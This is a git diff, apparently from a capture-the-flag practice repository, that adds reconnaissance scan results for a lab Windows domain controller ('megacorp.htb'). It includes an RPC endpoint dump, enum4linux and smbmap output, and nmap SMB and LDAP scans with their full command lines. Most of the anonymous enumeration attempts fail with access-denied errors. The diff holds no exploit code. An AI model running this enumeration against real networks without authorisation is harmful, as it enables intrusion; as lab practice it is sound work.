APIs +Bindings: + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: BFE.DLL +UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API +Bindings: + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service +Bindings: + ncacn_np:\\DC[\PIPE\wkssvc] + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs +Bindings: + ncalrpc:[OLE5FCB0823110EF79154A84BC1C955] + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + 
ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: iphlpsvc.dll +UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint +Bindings: + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : 51A227AE-825B-41F2-B4A9-1AC9557A1018 v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 8FB74744-B2FF-4C00-BE0D-9EF9A191FE1B v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + 
ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : B25A52BF-E5DD-4F4A-AEA6-8CA7272A0E86 v2.0 KeyIso +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-NRPC]: Netlogon Remote Protocol +Provider: netlogon.dll +UUID : 12345678-1234-ABCD-EF00-01234567CFFB v1.0 +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-RAA]: Remote Authorization API Protocol +Provider: N/A +UUID : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + 
ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote +Provider: lsasrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AB v0.0 +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol +Provider: ntdsai.dll +UUID : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + 
ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol +Provider: samsrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AC v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: srvsvc.dll +UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: sysmain.dll +UUID : B58AA02E-2884-4E97-8176-4EE06D794184 v1.0 +Bindings: + ncalrpc:[LRPC-6ba6be7619ad5499b5] + +Protocol: N/A +Provider: N/A +UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server +Bindings: + ncalrpc:[LRPC-e9c9cb51676dd7958e] + +Protocol: N/A +Provider: IKEEXT.DLL +UUID : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API +Bindings: + ncalrpc:[LRPC-a6cbf0f8554ac2dd0e] + +Protocol: N/A +Provider: N/A +UUID : 650A7E26-EAB8-5533-CE43-9C1DFCE11511 v1.0 Vpn APIs +Bindings: + ncalrpc:[LRPC-78511121f1275f430c] + ncalrpc:[VpnikeRpc] + ncalrpc:[RasmanLrpc] + ncacn_np:\\DC[\PIPE\ROUTER] + +Protocol: [MS-SCMR]: Service Control Manager Remote Protocol +Provider: services.exe +UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49678] + +Protocol: [MS-CMPO]: MSDTC Connection Manager: 
+Provider: msdtcprx.dll +UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 +Bindings: + ncalrpc:[LRPC-3bcaafee1590c0de20] + ncalrpc:[OLE17B51056E4D45A611212712C1451] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + +Protocol: N/A +Provider: N/A +UUID : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0 +Bindings: + ncalrpc:[LRPC-802031e034c1f025bd] + +Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management +Provider: dns.exe +UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49695] + +Protocol: [MS-FRS2]: Distributed File System Replication Protocol +Provider: dfsrmig.exe +UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service +Bindings: + ncacn_ip_tcp:10.129.243.131[49843] + ncalrpc:[OLECF74F747061ABA28294F2BDC6FF0] + +Protocol: N/A +Provider: N/A +UUID : BF4DC912-E52F-4904-8EBE-9317C1BDD497 v1.0 +Bindings: + ncalrpc:[LRPC-92939372b55364a6c8] + ncalrpc:[OLE9D9AB6AB4D22AD38C10DD1548060] + +[*] Received 405 endpoints. + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml new file mode 100644 index 00000000..6f81964a --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml @@ -0,0 +1,36 @@ + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/o:microsoft:windows + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt new file mode 100644 index 00000000..84e5c972 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt 
@@ -0,0 +1,139 @@ +Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 28 14:27:53 2023 + + =========================================( Target Information )========================================= + +Target ........... 10.129.243.131 +RID Range ........ 500-550,1000-1050 +Username ......... '' +Password ......... '' +Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none + + + ===========================( Enumerating Workgroup/Domain on 10.129.243.131 )=========================== + + +[E] Can't find workgroup/domain + + + + ===============================( Nbtstat Information for 10.129.243.131 )=============================== + +Looking up status of 10.129.243.131 +No reply from 10.129.243.131 + + ==================================( Session Check on 10.129.243.131 )================================== + + +[+] Server 10.129.243.131 allows sessions using username '', password '' + + + ==========================( Getting information via LDAP for 10.129.243.131 )========================== + + +[+] 10.129.243.131 appears to be a child DC + + + ===============================( Getting domain SID for 10.129.243.131 )=============================== + +Domain Name: MEGACORP +Domain Sid: S-1-5-21-855300830-391258870-456067225 + +[+] Host is part of a domain (not a workgroup) + + + ==================================( OS information on 10.129.243.131 )================================== + + +[E] Can't get OS info with smbclient + + +[+] Got OS info for 10.129.243.131 from srvinfo: +do_cmd: Could not initialise srvsvc. 
Error was NT_STATUS_ACCESS_DENIED + + + ======================================( Users on 10.129.243.131 )====================================== + + +[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED + + + +[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED + + + ===============================( Machine Enumeration on 10.129.243.131 )=============================== + + +[E] Not implemented in this version of enum4linux. + + + ================================( Share Enumeration on 10.129.243.131 )================================ + +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) + + Sharename Type Comment + --------- ---- ------- +Reconnecting with SMB1 for workgroup listing. +Unable to connect with SMB1 -- no workgroup available + +[+] Attempting to map shares on 10.129.243.131 + + + ===========================( Password Policy Information for 10.129.243.131 )=========================== + + +[E] Unexpected error from polenum: + + + +[+] Attaching to 10.129.243.131 using a NULL share + +[+] Trying protocol 139/SMB... + + [!] Protocol failed: Cannot request session (Called Name:10.129.243.131) + +[+] Trying protocol 445/SMB... + + [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. + + + +[E] Failed to get password policy with rpcclient + + + + ======================================( Groups on 10.129.243.131 )====================================== + + +[+] Getting builtin groups: + + +[+]  Getting builtin group memberships: + + +[+]  Getting local groups: + + +[+]  Getting local group memberships: + + +[+]  Getting domain groups: + + +[+]  Getting domain group memberships: + + + =================( Users on 10.129.243.131 via RID cycling (RIDS: 500-550,1000-1050) )================= + + +[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. 
+ + + ==============================( Getting printer info for 10.129.243.131 )============================== + +do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED + + +enum4linux complete on Sat Oct 28 14:28:33 2023 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt new file mode 100644 index 00000000..8f23bc11 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt @@ -0,0 +1,3 @@ +Doing NBT name scan for addresses from 10.129.243.131 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt new file mode 100644 index 00000000..af09fa1c --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt @@ -0,0 +1,8 @@ +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) +Anonymous login successful + + Sharename Type Comment + --------- ---- ------- +Reconnecting with SMB1 for workgroup listing. +Unable to connect with SMB1 -- no workgroup available + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt new file mode 100644 index 00000000..d464d6d8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt @@ -0,0 +1,3 @@ +[!] RPC Authentication error occurred +[!] Authentication error on 10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt new file mode 100644 index 00000000..d464d6d8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt 
@@ -0,0 +1,3 @@ +[!] RPC Authentication error occurred +[!] Authentication error on 10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt new file mode 100644 index 00000000..d464d6d8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt @@ -0,0 +1,3 @@ +[!] RPC Authentication error occurred +[!] Authentication error on 10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt new file mode 100644 index 00000000..aa448409 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt 
@@ -0,0 +1,22 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 139 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.036s latency). +Scanned at 2023-10-28 14:27:57 CEST for 41s + +PORT STATE SERVICE REASON VERSION +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +|_smb-enum-services: ERROR: Script execution failed (use -d to debug) +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_smb2-time: ERROR: Script execution failed (use -d to debug) +|_smb-protocols: No dialects accepted. Something may be blocking the responses +|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! +|_smb-mbenum: ERROR: Script execution failed (use -d to debug) +|_smb2-capabilities: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! +|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! +|_smb-print-text: false + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:28:38 2023 -- 1 IP address (1 host up) scanned in 45.20 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml new file mode 100644 index 00000000..13cebdab --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml @@ -0,0 +1,43 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/o:microsoft:windows + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt new file mode 100644 index 00000000..782b6b8b --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt 
@@ -0,0 +1,108 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3268 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.050s latency). +Scanned at 2023-10-28 14:27:57 CEST for 17s + +PORT STATE SERVICE REASON VERSION +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name) +| ldap-rootdse: +| LDAP Results +| +| domainFunctionality: 7 +| forestFunctionality: 7 +| domainControllerFunctionality: 7 +| rootDomainNamingContext: DC=MEGACORP,DC=LOCAL +| ldapServiceName: MEGACORP.LOCAL:dc$@MEGACORP.LOCAL +| isGlobalCatalogReady: TRUE +| supportedSASLMechanisms: GSSAPI +| supportedSASLMechanisms: GSS-SPNEGO +| supportedSASLMechanisms: EXTERNAL +| supportedSASLMechanisms: DIGEST-MD5 +| supportedLDAPVersion: 3 +| supportedLDAPVersion: 2 +| supportedLDAPPolicies: MaxPoolThreads +| supportedLDAPPolicies: MaxPercentDirSyncRequests +| supportedLDAPPolicies: MaxDatagramRecv +| supportedLDAPPolicies: MaxReceiveBuffer +| supportedLDAPPolicies: InitRecvTimeout +| supportedLDAPPolicies: MaxConnections +| supportedLDAPPolicies: MaxConnIdleTime +| supportedLDAPPolicies: MaxPageSize +| supportedLDAPPolicies: MaxBatchReturnMessages +| supportedLDAPPolicies: MaxQueryDuration +| supportedLDAPPolicies: MaxDirSyncDuration +| supportedLDAPPolicies: MaxTempTableSize +| supportedLDAPPolicies: MaxResultSetSize +| supportedLDAPPolicies: MinResultSets +| supportedLDAPPolicies: MaxResultSetsPerConn +| supportedLDAPPolicies: MaxNotificationPerConn +| supportedLDAPPolicies: MaxValRange +| supportedLDAPPolicies: MaxValRangeTransitive +| 
supportedLDAPPolicies: ThreadMemoryLimit +| supportedLDAPPolicies: SystemMemoryLimitPercent +| supportedControl: 1.2.840.113556.1.4.319 +| supportedControl: 1.2.840.113556.1.4.801 +| supportedControl: 1.2.840.113556.1.4.473 +| supportedControl: 1.2.840.113556.1.4.528 +| supportedControl: 1.2.840.113556.1.4.417 +| supportedControl: 1.2.840.113556.1.4.619 +| supportedControl: 1.2.840.113556.1.4.841 +| supportedControl: 1.2.840.113556.1.4.529 +| supportedControl: 1.2.840.113556.1.4.805 +| supportedControl: 1.2.840.113556.1.4.521 +| supportedControl: 1.2.840.113556.1.4.970 +| supportedControl: 1.2.840.113556.1.4.1338 +| supportedControl: 1.2.840.113556.1.4.474 +| supportedControl: 1.2.840.113556.1.4.1339 +| supportedControl: 1.2.840.113556.1.4.1340 +| supportedControl: 1.2.840.113556.1.4.1413 +| supportedControl: 2.16.840.1.113730.3.4.9 +| supportedControl: 2.16.840.1.113730.3.4.10 +| supportedControl: 1.2.840.113556.1.4.1504 +| supportedControl: 1.2.840.113556.1.4.1852 +| supportedControl: 1.2.840.113556.1.4.802 +| supportedControl: 1.2.840.113556.1.4.1907 +| supportedControl: 1.2.840.113556.1.4.1948 +| supportedControl: 1.2.840.113556.1.4.1974 +| supportedControl: 1.2.840.113556.1.4.1341 +| supportedControl: 1.2.840.113556.1.4.2026 +| supportedControl: 1.2.840.113556.1.4.2064 +| supportedControl: 1.2.840.113556.1.4.2065 +| supportedControl: 1.2.840.113556.1.4.2066 +| supportedControl: 1.2.840.113556.1.4.2090 +| supportedControl: 1.2.840.113556.1.4.2205 +| supportedControl: 1.2.840.113556.1.4.2204 +| supportedControl: 1.2.840.113556.1.4.2206 +| supportedControl: 1.2.840.113556.1.4.2211 +| supportedControl: 1.2.840.113556.1.4.2239 +| supportedControl: 1.2.840.113556.1.4.2255 +| supportedControl: 1.2.840.113556.1.4.2256 +| supportedControl: 1.2.840.113556.1.4.2309 +| supportedControl: 1.2.840.113556.1.4.2330 +| supportedControl: 1.2.840.113556.1.4.2354 +| supportedCapabilities: 1.2.840.113556.1.4.800 +| supportedCapabilities: 1.2.840.113556.1.4.1670 +| 
supportedCapabilities: 1.2.840.113556.1.4.1791 +| supportedCapabilities: 1.2.840.113556.1.4.1935 +| supportedCapabilities: 1.2.840.113556.1.4.2080 +| supportedCapabilities: 1.2.840.113556.1.4.2237 +| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL +| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGACORP,DC=LOCAL +| schemaNamingContext: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL +| namingContexts: DC=MEGACORP,DC=LOCAL +| namingContexts: CN=Configuration,DC=MEGACORP,DC=LOCAL +| namingContexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL +| namingContexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL +| namingContexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL +| isSynchronized: TRUE +| highestCommittedUSN: 77897 +| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGACORP,DC=LOCAL +| dnsHostName: DC.MEGACORP.LOCAL +| defaultNamingContext: DC=MEGACORP,DC=LOCAL +| currentTime: 20231028122804.0Z +|_ configurationNamingContext: CN=Configuration,DC=MEGACORP,DC=LOCAL +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:28:14 2023 -- 1 IP address (1 host up) scanned in 21.16 seconds diff --git 